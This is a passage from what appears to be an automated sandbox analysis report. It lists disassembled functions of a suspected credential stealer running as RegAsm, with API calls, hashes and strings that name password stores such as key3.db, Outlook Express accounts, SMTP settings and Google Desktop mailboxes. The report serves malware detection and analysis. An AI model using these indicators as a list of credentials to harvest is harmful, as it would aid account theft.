                                                                                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                                                                                • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                                                                                                                                                • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                                                                                                                                                Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                • API String ID: 885266447-2471937615
                                                                                                                                                                                • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                                                                • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                                                                Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                                                  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                • String ID: Ul@$key3.db
                                                                                                                                                                                • API String ID: 1968906679-1563549157
                                                                                                                                                                                • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                                • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                                Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                • String ID: smtp
                                                                                                                                                                                • API String ID: 2625860049-60245459
                                                                                                                                                                                • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                • memset.MSVCRT ref: 00408258
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$EnumOpenmemset
                                                                                                                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                • API String ID: 2255314230-2212045309
                                                                                                                                                                                • Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                • Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FocusMessagePostmemset
                                                                                                                                                                                • String ID: S_@$l
                                                                                                                                                                                • API String ID: 3436799508-4018740455
                                                                                                                                                                                • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004092C0
                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                Strings
                                                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                                                • API String ID: 408644273-3424043681
                                                                                                                                                                                • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                                                                • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                                                                Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                                                • String ID: C^@$X$ini
                                                                                                                                                                                • API String ID: 714388716-917056472
                                                                                                                                                                                • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                                                • API String ID: 3492281209-168460110
                                                                                                                                                                                • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClassName_strcmpimemset
                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                • API String ID: 275601554-2167791130
                                                                                                                                                                                • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                Function 00410F99 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                • API String ID: 534179979-1506664499
                                                                                                                                                                                • Opcode ID: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                • Instruction ID: 0aecfb21e5a5e73b57ea68f7d566dfb4b74aadbd5913b1eaff8a54c705ff6fdb
                                                                                                                                                                                • Opcode Fuzzy Hash: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                • Instruction Fuzzy Hash: F9D05B3E3026106BB6615B366C89EAFAAD5DFCA75271D0031F940E2150CB644C438D69
                                                                                                                                                                                Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$_mbscat
                                                                                                                                                                                • String ID: 3CD
                                                                                                                                                                                • API String ID: 3951308622-1938365332
                                                                                                                                                                                • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscat$_mbscpy
                                                                                                                                                                                • String ID: Password2
                                                                                                                                                                                • API String ID: 2600922555-1856559283
                                                                                                                                                                                • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                                Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: rows deleted
                                                                                                                                                                                • API String ID: 2221118986-571615504
                                                                                                                                                                                • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3384217055-0
                                                                                                                                                                                • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                                Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                                                • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                                • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                                • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __allrem.LIBCMT ref: 00425850
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                                                • __allrem.LIBCMT ref: 00425933
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                                • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                                                                • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                                                                Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                • API String ID: 2221118986-515162456
                                                                                                                                                                                • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                Function 0042FF31 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 144COMMON
                                                                                                                                                                                Download Yara Rule
